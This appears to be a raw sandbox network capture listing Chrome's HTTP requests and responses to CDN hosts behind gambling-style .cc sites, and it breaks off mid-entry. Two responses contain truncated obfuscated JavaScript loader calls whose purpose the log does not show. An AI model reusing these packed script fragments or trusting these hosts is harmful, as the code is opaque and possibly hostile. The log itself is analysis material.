                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          745192.168.2.550527183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC630OUTGET /061410/rcenter/msites/themes/base.css HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://8vpfnx.eveday.me/061410/rcenter/msites/themes/default/common.css?v=1717580749344
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          746192.168.2.55053490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC553OUTGET /pc/240516-03/static/js/t4045-subNav-js.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:26 UTC627INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 724
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:01:39 GMT
                                                                                                                                                          ETag: "6645cb73-2d4"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE23[4],EU-FRA-paris-GLOBAL1-CACHE26[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467534
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 81ade3441bb63ae7c72f59989612f383
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124466
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:26 UTC724INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 7a 41 46 67 43 59 42 64 41 47 67 47 38 42 4e 41 43 51 48 5a 71 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 78 46 4c 53 6b 4f 41 53 6e 49 41 69 46 6b 68 41 41 43 4a 42 77 42 4f 58 54 6d 49 44 63 41 65 54 41 41 72 45 4a 77 42 30 41 45 78 42 4d 75 61 45 41 41 56 35 4b 43 43 48 6b 63 41 6e 70 6b 46 69 41 2b 73 35 42 49 41 73 69 6e 30 73 41 4e 69 44 45 4b 41 44 63 6f 58 78 59 51 42 67 42 43 41 41 59 41 58 32 45 68 41 30 64 53 4d 51 42 62 45 44 51 57 41 42 6b 75 4f 55 44 57 64 6d 35 65 55 58 6b 51 44 68 5a 35 4e 47 6b 59 65 4d 54 39 5a 4c 45 4f 4b 77 42 4a 56 49 42 7a 66 4c 5a 4f 48 6a 52 4d 45 72 4b 4b 71 70 52 61 6a 69 53 6e 4d 42 51 4f 4a 74 54
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAzAFgCYBdAGgG8BNACQHZqAuAMwFc0YAXAS3UxFLSkOASnIAiFkhAACJBwBOXTmIDcAeTAArEJwB0AExBMuaEAAV5KCCHkcAnpkFiA+s5BIAsin0sANiDEKADcoXxYQBgBCAAYAX2EhA0dSMQBbEDQWABkuOUDWdm5eUXkQDhZ5NGkYeMT9ZLEOKwBJVIBzfLZOHjRMErKKqpRajiSnMBQOJtT


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          747192.168.2.550528183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC630OUTGET /061410/rcenter/common/themes/base.css HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://8vpfnx.eveday.me/061410/rcenter/msites/themes/default/common.css?v=1717580749344
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          748192.168.2.55053390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC557OUTGET /pc/240516-03/static/js/components/menuSubA.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:26 UTC636INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 2756
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:53 GMT
                                                                                                                                                          ETag: "6645cacd-ac4"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE14[11],EU-GER-frankfurt-GLOBAL1-CACHE7[0,TCP_HIT,9],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826084
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 77964a2f60b5434b75e4d4b10199f712
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765916
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:26 UTC2756INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 5a 6b 49 46 30 41 61 41 62 78 51 44 55 42 48 41 44 51 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 54 4a 45 39 6b 70 77 43 55 5a 41 45 54 4d 6b 49 41 41 52 4a 32 41 4a 30 34 64 52 41 62 67 44 79 59 41 46 59 67 4f 41 4f 67 41 6d 49 52 70 7a 51 67 41 43 6e 4a 51 51 51 63 39 67 45 39 4d 41 30 51 48 30 6e 49 4a 41 46 6b 55 65 35 67 42 73 51 6f 38 67 41 33 4b 42 39 6d 45 48 6f 41 51 67 41 47 41 46 38 68 5a 57 43 35 4b 52 41 41 58 6b 35 4d 55 51 41 52 50 51 41 4f 59 46 45 68 45 6a 51 30 6e 54 52 4d 45 45 4b 66 4e 49 79 6f 6d 41 68 47 41 70 4a 6d 61 74 45 41 4f 51 42 4e 41 41 39 56 52 71 67 55 7a 44 4b 68 54 44 49 59 6b 6e 55 74 44 6b 78 6d 48 51
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZkIF0AaAbxQDUBHADQC4AzAVzRgBcBLdTJE9kpwCUZAETMkIAARJ2AJ04dRAbgDyYAFYgOAOgAmIRpzQgACnJQQQc9gE9MA0QH0nIJAFkUe5gBsQo8gA3KB9mEHoAQgAGAF8hZWC5KRAAXk5MUQARPQAOYFEhEjQ0nTRMEEKfNIyomAhGApJmatEAOQBNAA9VRqgUzDKhTDIYknUtDkxmHQ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          749192.168.2.55053590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC605OUTGET /pc/image-pc/index/312/nav/fish/03.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          750192.168.2.55053623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC614OUTGET /pc/image-pc/index/245/games/mg/mg_game_01.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          751192.168.2.55053254.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC625OUTGET /fiximg/ac-20200404/fileupload/uy09/202109/202109100713339.png HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://yh8613.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          752192.168.2.55053754.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:26 UTC654OUTGET /pc/image-pc/index/121/member/login-bg.png HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-qq.gzjqwlkj.com/pc/240516-03/static/css/t3685.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          753192.168.2.55054023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:26 UTC614OUTGET /pc/image-pc/index/245/games/mg/mg_game_02.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          754192.168.2.55054123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:26 UTC614OUTGET /pc/image-pc/index/245/games/mg/mg_game_03.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          755192.168.2.55053854.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:26 UTC575OUTGET /pc/240516-03/static/js/components/121/views/home/indexContent.js HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          756192.168.2.55053923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          757192.168.2.55054290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          758192.168.2.55054323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          759192.168.2.55054523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          760192.168.2.55054490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          761192.168.2.55054990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          762192.168.2.55054723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          763192.168.2.55054623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          764192.168.2.55054890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          765192.168.2.55055090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          766192.168.2.55055190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          767192.168.2.55055290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          768192.168.2.55055590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          769192.168.2.55055690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          770192.168.2.55055890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          771192.168.2.55056190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          772192.168.2.55056090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          773192.168.2.550557183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          774192.168.2.55056390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          775192.168.2.55056490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          776192.168.2.55056590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          777192.168.2.55053038.174.148.24434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          778192.168.2.55056990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          779192.168.2.55056790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          780192.168.2.550562183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          781192.168.2.55056890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          782192.168.2.55057118.66.147.1214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          783192.168.2.55056654.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          784192.168.2.550570183.61.168.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          785192.168.2.55052938.174.148.24434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          786192.168.2.55057223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          787192.168.2.55057390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          788192.168.2.55057723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          789192.168.2.55057890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          790192.168.2.550574183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          791192.168.2.550575183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          792192.168.2.550576183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          793192.168.2.55058123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          794192.168.2.55058523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          795192.168.2.55058490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          796192.168.2.55058323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
